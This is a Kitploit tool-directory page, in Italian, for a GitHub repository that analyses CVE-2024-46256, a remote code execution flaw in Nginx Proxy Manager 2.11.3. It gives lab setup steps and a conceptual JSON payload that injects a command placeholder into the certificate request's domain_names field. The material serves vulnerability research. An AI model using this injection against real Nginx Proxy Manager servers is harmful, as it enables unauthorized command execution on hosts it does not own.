Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2024-46256 — CVE-2024-46256 strumento | Kitploit
Strumenti/GitHubGitHub/kimtangker/cve-2024-46256
Generazione di PayloadAnalisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebPenetration TestingRed Teaming
GitHubkimtangker/cve-2024-46256

CVE-2024-46256

CVE-2024-46256 strumento

Vedi Repository
810 mesi faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

Analisi della vulnerabilità RCE CVE-2024-46256 in Nginx Proxy Manager

Configurazione dell'ambiente

1. Avvio dell'ambiente Nginx Proxy Manager 2.11.3

root@kitploit:~

docker-compose up -d

Oppure è possibile utilizzare lo script automatico:

root@kitploit:~

python setup_environment.py

2. Accesso a Nginx Proxy Manager

  • URL: http://localhost:81

  • Completare la configurazione iniziale, quindi procedere con il test

  • Accedere con l'account amministratore predefinito (email: [email protected] / password: changeme)

  • Verificare i permessi di accesso alle funzionalità relative all'emissione dei certificati

Informazioni sulla vulnerabilità

  • CVE ID: CVE-2024-46256

  • Prodotto: Nginx Proxy Manager

Scarica lo strumento
  • Versione: 2.11.3

  • Tipo di vulnerabilità: Remote Code Execution (RCE)

  • CVSS: Alto

  • Codice PoC

    Il PoC induce RCE tramite un utente autenticato che, nel processo di richiesta di emissione di un certificato (ad es. Let's Encrypt), effettua un'iniezione di template/comandi nel campo del nome di dominio.

    Esempio di payload (esempio concettuale):

    root@kitploit:~
    {
      "domain_names": ["test.com\"||{command}||\\n test.com\""],
      "meta": {
        "dns_challenge": false,
        "letsencrypt_agree": true,
        "letsencrypt_email": "[email protected]"
      },
      "provider": "letsencrypt"
    }
    

    Ambiente di analisi

    • OS: Windows 10

    • Docker: versione più recente

    • Nginx Proxy Manager: 2.11.3